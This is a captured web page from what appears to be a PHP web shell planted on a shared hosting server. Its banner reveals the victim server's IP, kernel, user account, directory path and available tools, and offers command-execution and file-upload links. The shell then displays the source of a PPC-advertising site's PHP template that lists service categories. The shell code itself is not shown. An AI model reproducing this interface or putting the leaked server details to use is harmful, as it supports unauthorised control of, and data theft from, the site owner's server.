Server IP : 103.53.40.154 / Your IP : 18.191.154.132 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/ppcadsexpert.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<section> <div class="w-100 pt-50 pb-80"> <div class="blog-wrap w-100 px-15"> <div class="row"> <div class="sec-title2 mb-70 text-center w-100"> <div class="d-inline-block"> <h1 class="mb-0 text-uppercase text-color2 mini-bar">Best PPC Ads Services In <?=$locationName?></h1> </div> </div><!-- Section Title Style 2 --> <?php $index_ser_sql=db_query("select * from tbl_category where category_status='Active' and category_for_home='Yes' order by category_order_by asc limit 6"); while($index_ser_res=mysqli_fetch_array($index_ser_sql)) { ?> <div class="col-md-6 col-sm-6 col-lg-4"> <article class="post-style1 w-100 brd-rd20 overflow-hidden position-relative"> <div class="post-img overflow-hidden w-100"> <a class="d-block" href="<?=$site_url?>/<?=$index_ser_res['category_url']?>.html" title="<?=$index_ser_res['category_name']?>"> <img class="img-fluid w-100" src="<?=$site_url?>/uploaded_files/<?=$index_ser_res['category_image_name']?>" alt="<?=str_replace("LOCATION",$locationName,$index_ser_res['category_image_alt_title'])?>" title="<?=str_replace("LOCATION",$locationName,$index_ser_res['category_image_alt_title'])?>"></a> </div> <div class="post-info w-100 position-relative"> <!-- <a class="brd-rd10 text-uppercase" href="javascript:void(0);" title="">Facebook Ads</a> --> <h3 class="mb-0"><a href="<?=$site_url?>/<?=$index_ser_res['category_url']?>.html" title="<?=str_replace("LOCATION",$locationName,$index_ser_res['category_image_alt_title'])?>"><?=$index_ser_res['category_name']?></a></h3> <p class="mb-0"> <?php $index_ser_desc=strip_tags($index_ser_res['category_short_description']); echo substr($index_ser_desc, 0,125)."..."; ?> </p> <!-- <span class="pst-cat d-inline-block"><a href="javascript:void(0);" title="">mobile</a>, <a href="javascript:void(0);" title="">web</a></span> --> </div> <div class="post-bottom-info overflow-hidden"> <div class="post-author"> <a href="<?=$site_url?>/<?=$index_ser_res['category_url']?>.html" title="<?=$index_ser_res['category_name']?>"> <!-- <img class="img-fluid rounded-circle" src="assets/images/author-img.png" alt="Author image"> --><span>Read More <i class="fa fa-angle-right"></i></span></a> </div> </div> </article> </div> <?}?> </div> </div><!-- Blog Wrap --> </div> </section>